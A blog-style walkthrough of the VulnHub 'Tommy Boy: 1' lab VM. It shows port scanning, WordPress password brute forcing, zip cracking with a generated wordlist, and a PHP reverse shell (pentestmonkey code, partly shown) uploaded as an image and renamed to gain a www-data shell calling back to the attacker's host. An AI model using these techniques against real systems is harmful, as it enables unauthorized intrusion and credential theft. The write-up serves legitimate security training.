Tommy Boy: 1 Walkthrough

Today I finally completed the Tommy Boy: 1 VM created by Brian Johnson that was on VulnHub. 

This was one of my favorite VM's seeing that it was based on the movie Tommy Boy. I can honestly say it's been a long time since I've seen this movie, but after this VM, it looks like I'll need to set some time aside in the near future to re-watch this classic Chris Farley and David Spade movie.

The objective of this VM was to "restore a backup copy of the homepage to Callahan Auto's server. However, to consider the box fully pwned, you'll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message."

Sounds simple enough, let's see what it had to take to pwn this box!


Per my usual strategy, I kick off an nmap scan against the entire subnet that is on my VirtualBox interface:


root@localhost:~/VM/tommyboy# nmap 192.168.56.0/24

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 16:59 CDT
Nmap scan report for 192.168.56.100
Host is up (0.000057s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:E1:F0:DE (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.101
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8008/tcp open  http
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.1
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.79 seconds
root@localhost:~/VM/tommyboy#

Looks like 192.168.56.101 is the host machine! I see right away that there are 3 ports running, but let's make sure that there's nothing else hidden. I run nmap again, this time against all ports:


root@localhost:~/VM/tommyboy# nmap -p- 192.168.56.101

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:01 CDT
Nmap scan report for 192.168.56.101
Host is up (0.00097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
root@localhost:~/VM/tommyboy# 

Ah-ha! Sneaky sneaky. Appears that another port has been unveiled: 65534. I will make note of this for future research. I still would like more information about this host, so I run nmap again against these 4 ports and add a few more switches in nmap:


root@localhost:~/VM/tommyboy# nmap -p22,80,8008,65534 -sV -A 192.168.56.101

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-09 17:03 CDT
Nmap scan report for 192.168.56.101
Host is up (0.00021s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
65534/tcp open  ftp     ProFTPD
MAC Address: 08:00:27:11:B5:5C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.03 seconds
root@localhost:~/VM/tommyboy# 

Okay great. Looks like we have something to work with now. Right away, I see that there's "flag-numero-uno.txt" as an entry in robots.txt. I grab this flag first and take note of other headers and directories listed on port 80 and 8008:


Flag 1 captured! I keep note of the Flag data:


Flag1 data: B34rcl4ws

Great! Flag 1 is down. Let's keep looking around.

After more enumeration, I open up the source page of the homepage. As suspected, there's some comments that are between Nick and Richard:


<!--Comment from Nick: backup copy is in Big Tom's home folder--> 
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password--> 
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time--> 
<!--Comment from Richard: please, I'll ask nicely--> 
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog--> 
<!--Comment from Richard: Deal. Where's the blog again?--> 
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget? Thanks--> 

Awesome! I check out the video and see that we're being pointed to prehistoric forest.

I navigate to the page and I'm presented with the Callahan Employee Blog:


I start reading some of the blog posts and find the second flag! It's a comment by Michelle Michelle on Announcing the Callahan internal company blog!" post:


I navigate to the following directory and pick up the second flag:
http://192.168.56.101/prehistoricforest/thisisthesecondflagyayyou.txt


Sweet! Flag 2 has been found. I add this to my list:


Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky

With the second flag under my belt, there still is a lot of work to do. My next step is to enumerate more on this WordPress site. I use wpscan to collect a list of users:


root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --enumerate u


Wonderful! We have 4 usernames to work with. Let's see if we can get lucky and brute force some of these passwords.

I tried against all 4 usernames and finally had a password crack with the username "tom":


root@localhost:~/VM/tommyboy# wpscan --url http://192.168.56.101/prehistoricforest/ --wordlist ~/tools/rockyou.txt --username tom


After using wpscan, we were able to extract the password for the following user:

username: tom
password: tomtom1

Let's try logging in with our newly found username and password:


And we're in! Time to start navigating around.

Now, I was able to find some great information while logged in as the admin on WordPress, however, most of the data collected will be used later in this VM.

I realize that I need to access this password protected post if I want to go any further. Looking back at the conversation between Richard and Tom Jr under the post "Son of A!", Richard tells Tom Jr to look at the picture in the directory /richard to jog his memory.

Seeing that this is a photo, I decide that there may be some stenography involved. So, I download the picture and run exiftool against it.


root@localhost:~/VM/tommyboy# exiftool shockedrichard.jpg 
ExifTool Version Number         : 10.15
File Name                       : 

[...snippet...]

Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     :  

[...snippet...]

Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6
root@localhost:~/VM/tommyboy# 

Well what have we here? I see a User Comment with the following string:

ce154b5a8e59c89732bc25d6a2e6b90b

This looks like an md5 hash to me. So I take it over to HashKiller and run the md5 hash through. It finds a match and the hash was generated from the word "spanky".

By typing in spanky, we are able to view the Protected Message on the WordPress Site.

Looking at the message, Nick was the IT guy and he has now left the company. Luckily for us, he gave the following information to Richard:


    You guys are all hopeless sheep :-/
    The Callahan Auto Web site is usually pretty stable.  But if for some reason the page is ever down, you guys will probably go out of business.  But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
        IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.  Warning: Big Tom always forgets his account password.  Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called.  Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

    I left a few other bits of information in my home folder, which the new guy can access via FTP.  Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it.  Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for.  And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.  Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

    You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password.  I removed my SSH access because I *DON’T* want you calling me in case of an emergency.  But my creds still work on FTP.  Your new fresh fish can connect using my credentials and if he/she has half a brain.

Okay, first things first, I remember when scanning all ports, there was an unknown service under port 65534. This must be the FTP service that Nick is referencing. So, I wait until the top of the hour and the FTP service is up and running again.

I access the FTP service utilizing the following "easy to guess" passwords for nickburns:

username: nickburns
password: nickburns

Once logged into the ftp share, I see a file called readme.txt. I download the file to my local host and cat it's contents:


root@localhost:~/VM/tommyboy# cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick
root@localhost:~/VM/tommyboy# 

Okay, so it looks like there's a subfolder called "NickIzL33t" on the server. I figure that's what port 8008 is being used for. I navigate to the following page and I'm presented with this:

 http://192.168.56.101:8008/NickIzL33t


So, this part actually hung me up for a bit. After reading and re-reading what was said, it dawns on me that Nick made a few references that were very important. He drops hints like "phone" and "Steve Jobs". There must be some way I can make it look like I'm coming from an apple/iphone device. Doing some research, there is a setting within BurpSuite that allows you to change your User-Agent to emulate as an iOS device!





As shown above, under Proxy > Options > Match and Replace, there's a way to match the User-Agent and Replace with a regex emulating iOS.


I then navigate to the page again after modifying the settings and I'm presented with a new page:


Nick then mentions that you need to know the EXACT name of the .html to break into the fortress. So I then kick off Dirbuster and edit the following settings:

- User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
- Change directory to start with NicklzL33t
- update extension from php to html
- utilizing the rockyou.txt wordlist

With the switches set, I find the following page:


http://192.168.56.101:8008/NickIzL33t/fallon1.html


Woot! I see a link to the third flag! I navigate to the following address to capture the flag:

http://192.168.56.101:8008/NickIzL33t/flagtres.txt


THREE OF 5 FLAGS - you're awesome sauce. Flag data: TinyHead

Just like the file says, I've captured 3 of the 5 flags. Here's my current list of flags:



Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead


I'm over halfway there, it's time to keep moving. I read the context of hint.txt:


Okay, looks like it's time to generate a wordlist to meet all these requirements. I crunch to accomplish this task. I use the following to generate my password-list:


root@localhost:~/VM/tommyboy# crunch 13 13 -t bev,%%@@^1995 -o crunch.txt

Now that my wordlist has been generated, I download Big Tom's encrypted pw backups file called "t0msp4ssw0rdz.zip".

I utilize fcrackzip to perform brute forcing against the password protected zip file:


root@localhost:~/VM/tommyboy# fcrackzip -D -p crunch.txt -u -v t0msp4ssw0rdz.zip 


Awesome! The password used to protect this zip file was:

password: bevH00tr$1995

I unzip the file and read the contents of passwords.txt:





root@localhost:~/VM/tommyboy# cat passwords.txt 
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
root@localhost:~/VM/tommyboy# 

Okay, so the Callahan Auto Server username and password appear to be the credentials needed to SSH into the server. Remembering what I found on the WordPress site earlier after logging in as admin, there was a draft created by Big Tom saying the following:






If my guess is correct, I should be able to add 1938!! to the end of fatguyinalittlecoat to SSH into the server as bigtommysenior:

username: bigtommysenior
password: fatguyinalittlecoat1938!!


Success!

I take a look around in bigtommysenior's home directory and there are 3 files listed:


bigtommysenior@CallahanAutoSrv01:~$ ls -l
total 12
-rw-r--r-- 1 bigtommysenior bigtommysenior 307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior 237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior 630 Jul  7 17:59 LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ 

What have we here? Is that the 4th flag?!


Why yes it is! Now I have 4 out of 5 flags:


Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
Flag4 data: EditButton

Alright, it's time to find this 5th flag. But first, I need to restore the Callahan Web Page by copying over callahanbak.bak to index.html located in /var/www/html:


bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html

I navigate to the home page:


Awesome! The webpage has been restored! However, this is not the end. I still need flag 5!

I take the advice from flag 4 and go to the root of the server and look for /5.txt:


bigtommysenior@CallahanAutoSrv01:~$ cd /
bigtommysenior@CallahanAutoSrv01:/$ ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Jul 15 12:35 .
drwxr-xr-x  25 root     root     4.0K Jul 15 12:35 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Jul  6 08:32 bin
drwxr-xr-x   4 root     root     1.0K Jul 14 13:38 boot
drwxr-xr-x  20 root     root     4.1K Aug 11 13:53 dev

[...snippet...]

bigtommysenior@CallahanAutoSrv01:/$ 

Interesting. I see 5.txt, however, it's owned by www-data and only that user or members of the www-data group can actually read its contents. There must be a way to switch to this user, or better yet, maybe there's a way to run a process that is owned by www-data and get the file that way...

After some long hard thinking, I realize that since I'm on the server, maybe it's a good idea to see if there was anything else hidden within "nicks" directory:


bigtommysenior@CallahanAutoSrv01:/$ cd /var/
bigtommysenior@CallahanAutoSrv01:/var$ ls
backups  crash  local  log   opt  snap   thatsg0nnaleaveamark  www
cache    lib    lock   mail  run  spool  tmp
bigtommysenior@CallahanAutoSrv01:/var$ cd thatsg0nnaleaveamark/
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ ls
index.html  NickIzL33t
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark$ cd NickIzL33t/
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$ ls
fallon1.html  flagtres.txt  hint.txt  index.html  P4TCH_4D4MS  t0msp4ssw0rdz.zip
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t$

Ah-ha! There's a directory called P4TCH_4D4MS within NickIzL33t. I navigate to that directory through the browser:

http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/





Interesting. So there's an option to upload an image to the server.

Also, when I navigate to the P4TCH_4D4MS directory in the server, the uploads directory is world write-able!


bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K Jul 15 12:47 .
drwxr-xr-x 3 www-data www-data 4.0K Jul 17 08:19 ..
-rw-r--r-- 1 root     root     1.6K Jul 15 12:25 backupload.php
-rw-r--r-- 1 root     root      206 Jul 15 12:25 .htaccess
-rw-r--r-- 1 root     root      280 Jul 15 12:03 index.html
-rw-r--r-- 1 root     root     1.6K Jul 15 12:47 upload.php
drwxrwxrwx 2 www-data www-data 4.0K Aug 11 20:07 uploads
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ 

I decide that if I want to read the contents of the 5th flag as www-data, then I'll want to upload a reverse shell to the server and catch the shell running as www-data. In order to do this I first need to upload my shell as a .jpg, change the file on the server to a .php and then navigate to the directory its located in and catch the shell! Let's see how this was done:


root@localhost:~/VM/tommyboy# cat geoda.php.jpg 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

[...snippet...]

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.1';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

[...snippet...]

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
 if (!$daemon) {
  print "$string\n";
 }
}

?> 



root@localhost:~/VM/tommyboy# 

As shown above, I have my reverse shell geoda.php.jpg and I upload it to the server.

I then navigate to the server and copy the file and save it as a .php:


bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cp geoda.php.jpg geoda.php
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
geoda.php  geoda.php.jpg  index.html

Now that my reverse shell is in place, I fire up netcat on port 443 and navigate to where my shell is located:

http://192.168.56.101:8008/NickIzL33t/P4TCH_4D4MS/uploads/geoda.php




Yes! It worked. I then navigate to the root directory and cat flag 5:


Now I have all 5 flags! I then "blob it into one big chunk":


Flag1 data: B34rcl4ws
Flag2 data: Z4l1nsky
Flag3 data: TinyHead
Flag4 data: EditButton
Flag5 data: Buttcrack

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

I then go back to bigtommysenior via SSH and locate the LOOT.ZIP file, unzip it with the newly generated password, and cat the final text file:


bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS$ cd ~
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak  el-flag-numero-quatro.txt  LOOT.ZIP
bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP 
Archive:  LOOT.ZIP
[LOOT.ZIP] THE-END.txt password: 
  inflating: THE-END.txt             
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt 
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

</shamelessplugs>

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security
bigtommysenior@CallahanAutoSrv01:~$ 

Whew! Success!

This was an excellent VM. I was able to use a lot of tools that I've either never used before, tools that I've used but didn't know its full capabilities, or freshen up on tools that I haven't used in a while.

I'd like to thank Brian Johnson for creating such a wonderful VM and of course, VulnHub for hosting this for all of us to learn on